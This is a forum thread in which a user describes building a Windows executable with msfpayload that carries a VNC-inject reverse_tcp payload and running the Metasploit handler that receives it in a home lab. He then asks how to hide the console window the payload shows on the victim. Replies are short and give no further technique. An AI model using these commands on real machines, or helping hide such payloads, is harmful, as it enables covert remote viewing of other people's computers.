
Thread: Some Questions about msfpayload/Meterpreter

  1. #1
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    8

    Some Questions about msfpayload/Meterpreter

    Good evening, guys
    First, I want to say great thanks for the genius support in this forum.
    Friendly and professional answers aren't common.

    Lately I have been playing around a little bit with the combination of msfpayload and the vncinject payload.

    My environment:

    PC1: 192.168.0.2 (XP or Vista) (victim)
    PC2: 192.168.0.3 (BackTrack.... sure)

    I create an exe file with ./msfpayload /windows/vncinject/reverse_tcp LHOST=192.168.0.3 LPORT=5500 R | -c 2 -t exe -o test.exe

    On BackTrack I start the handler:
    > use exploits/multi/handler
    > set Payload /windows/vncinject/reverse_tcp
    > set LHOST 192.168.0.3
    > set LPORT 5500
    > exploit

    When the victim starts the exe, the VNC DLL gets injected and on BackTrack I get my window to watch.

    But now this bad blue cmd shell appears on the victim...
    Are there any possibilities to avoid this or catch the process and hide it?
    Is there any other payload option I have to use to avoid this?

    Another question is whether it is possible not to use the Metasploit handler on BackTrack to listen for the connection, but the RealVNC viewer or the UltraVNC viewer in listen mode?

    Big thanks to all who have an idea.

    Greetz
    Cyclone

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    We now have like 20 threads going on meterpreter.....

  3. #3
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    8

    Hi Purehate

    I've written this post but I can't find an answer to the questions, for example whether it is possible to use UltraVNC in listen mode. I've tried to do this, but when the payload tries to connect to UltraVNC (listen), nothing happens; instead the listener hangs. With the RealVNC listener, just nothing happens.
    Perhaps I use the wrong payload parameters...

    I will try to use the search function one more time, but the threads I've read don't
    deal with this problem.

    Greetz
    Cyclone

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Make sure you understand how firewalls work/function with bind_tcp and reverse_tcp. (keyword: dmz)

    Now a good piece of advice after reading is to check it locally and then make sure it works.
    Don't install any antivirus or firewall on your local machine. Just try it without and
    check how it works. It's really not that hard once you get to learn about it.

    There's plenty of Metasploit and Meterpreter documentation and docs on the internet, trust me.
    "I realized that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain." - MaXe

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    What is a "bad blue cmdshell..." ?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
